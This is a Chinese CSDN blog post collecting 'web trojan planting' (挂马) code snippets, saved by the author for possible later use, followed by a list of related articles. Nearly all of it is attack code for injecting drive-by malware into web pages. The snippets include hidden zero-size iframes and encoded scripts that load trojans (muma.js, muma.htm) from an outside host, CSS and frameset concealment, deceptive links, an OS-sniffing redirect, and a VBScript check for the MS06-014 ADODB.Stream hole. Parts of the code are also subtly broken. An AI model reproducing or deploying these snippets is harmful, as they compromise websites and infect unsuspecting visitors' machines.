常用的挂马代码

最新推荐文章于 2021-01-19 16:54:22 发布
最新推荐文章于 2021-01-19 16:54:22 发布
阅读量2.9k 收藏 1
点赞数
文章标签: javascript iframe html vbscript url function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chbccie/article/details/1779432
版权

在网上看到的,总结的不错,先保留下来没准以后用的上……

一:框架挂马
<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
muma.txt可改成任意后缀

四:body挂马
<body οnlοad="window.location='地址';"></body>

五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src="http://www.upx.com.cn/muma.htm/"></iframe>';

六:css中挂马
body {
background-image: url('javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>")')}

七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一:判断系统代码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>

十二:判断是否有ms06014代码

<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
end if
</script>

十三:智能读取js的代码demo

//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));

document.write("<iframe src=/"http://www.upx.com.cn/1/"+u_num+".htm/" width=/"0/" height=/"0/" frameborder=/"0/"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC /"-W3CDTD HTML 4.0 TransitionalEN/">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=/"text//html; charset=big5/">");
document.writeln("<META content=/"MSHTML 6.00.2900.3059/" name=GENERATOR><//HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=/"CURSOR: url(/'http:www.upx.com.cn//demo.js/')/">");
document.writeln("<DIV ");
document.writeln("style=/"CURSOR: url(/'http:www.upx.com.cn//demo.js/')/"><//DIV><//DIV><//BODY><//HTML>")

//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");
if (loU.length>1){

var loallPm = loU.split("&");

for (var i=0; i<loallPm.length; i++){
var loPm = loallPm[i].split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm;
}else{
return "";
}
}
}
}
return null;

 
chbccie
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码 10个代码
07-16
10个代码10个代码10个代码
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf
12-02
本文档介绍了一种常用的渗透测试工具——Beef,以及如何利用它对客户端浏览器进行劫持。 Beef(Browser Exploitation Framework)是一个基于Web的渗透测试框架,专门设计用于安全研究人员和渗透测试人员控制和操纵...
temp3
09-03 318
方式和系统判断等代码 http://www.hackbase.com 2007-7-28 黑客基地  一:框架
js常见案例
php菜鸟博客
08-23 364
一.案例案例1 var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1);...
网页类型
安静
06-01 1294
一:框架 二:js文件首先将以下代码document.write("");保存为xxx.js,则JS代码为 三:js变形加密 muma.txt可改成任意后缀四:body五:隐蔽top.document.body.innerHTML = top.document.body.innerHTML + /r/n;六:css中body { background-image: ur
网页代码大全
ytakcc的专栏
07-04 405
一:框架&lt;iframe src=地址 width=0 height=0&gt;&lt;/iframe&gt; 二:js文件首先将以下代码document.write("&lt;iframe width='0' height='0' src='地址'&gt;&lt;/iframe&gt;");保存为xxx.js,则JS代码为&lt;script language=javascrip...
了解IE9浏览器的多种隐私保护手段.docx
09-27
IE9在隐私保护方面的表现相当出色,尤其是在防止恶意网站、钓鱼网站和网站方面,表现出强大的安全性能。然而,与其他浏览器相比,IE9在某些操作便捷性上还有待提升,如快速访问常用网站或恢复已关闭的网页等功能...
啊D注入工具 V2.32.exe
08-13
”通常指的是在网站上放置恶意代码,使得访问该网站的用户可能会受到感染。啊D注入工具可能包含检测网站是否已被的功能,或者能模拟行为,以便安全团队理解攻击者的手段并采取防御措施。 啊D注入工具...
白帽子讲浏览器安全.钱文祥(带详细书签).pdf
03-08
7.3 一个简单的代码的处理 169 7.3.1 快速判断 169 7.3.2 JS代码的格式化 170 7.4 更为复杂的代码处理:对Angler网工具包的反混淆 170 7.4.1 Angler EK的特征 170 7.4.2 推理:找出代码中的“解密-...
护卫神·云查杀系统
08-16
网页木是网络犯罪分子常用的手段,通过植入恶意代码到正常网页中,对访问者进行欺诈或盗取敏感信息。护卫神·云查杀系统采用先进的云查杀技术,实时更新病毒库,确保能快速识别并消除这些威胁。云查杀技术的优势...
常见方式
12-21
常见方式
二行代码解决全部网页木
epic2005
04-08 748
还是问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。前不久《http://bbs.blueidea.com/thread-2818052-1-1.html一行代码解决iframe(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在的方式真如我
常见JS方法及如何防止网站被黑客
weixin_34124577的博客
03-09 267
最近有朋友说自己的网站平时并未作弊,文章也都是原创的,更新很稳定。可不知道为什么网站突然就被各大搜索引擎降权了,一直找不到原因。最后发现是网站被了,导致网站被连累了。在此,借助海祥博客的平台,给大家简单的介绍下js的方法及如何防止网站被。 一、常见JS方法 现在最多见的JS方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的...
网页病毒原理解析
bing_JavaScript的博客
05-05 4912
所谓的,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自
总结常用代码
weixin_30639719的博客
05-18 115
一:框架 <iframe src=地址 width=0 height=0></iframe> 二:js文件 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS代码为 <script langu...
很多网站被确找不到代码,arp原理剖析
yuexi_hou的专栏
11-26 2905
不管是访问服务器上的任何网页,就连404的页面也会在 ;,的位置在标记左右,上面这段恶意代码,它会 每隔几秒加入代码,也就是说在输出具体的东西之前就被了,有时有有时又没有,不是网页源代码问题,也没有在网页源代码中加入恶意代码,即使重装服务器, 格式化重分区过第一个硬盘,放上去网站没多久一样再会出现这种情况.  首先就排除了网站被入侵的可能,因为首页能加在那个位置只能是 title的地
如何进行网站检测与清除
热门推荐
OOM
06-29 2万+
转自:http://sec.chinabyte.com/206/8919706.shtml 不完全统计,90%的网站都被是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。目前主要是为了商业利
mysql+代码_转载:代码大全
weixin_27130513的博客
01-19 116
代码大全一:框架二:js文件首先将以下代码document.write("");保存为xxx.js,则JS代码为三:js变形加密muma.txt可改成任意后缀四:body五:隐蔽top.document.body.innerHTML = top.document.body.innerHTML + '\r\n';六:css中body {background-imag...
thinkphp扫描软件
最新发布
10-07
这种软件能够对网站代码进行深度扫描,检查是否存在ThinkPHP的特定漏洞,例如访问控制不当或代码注入等。通过快速识别安全风险,扫描软件可以帮助网站管理员及时采取对应的安全措施,尽量避免黑客的攻击。 使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值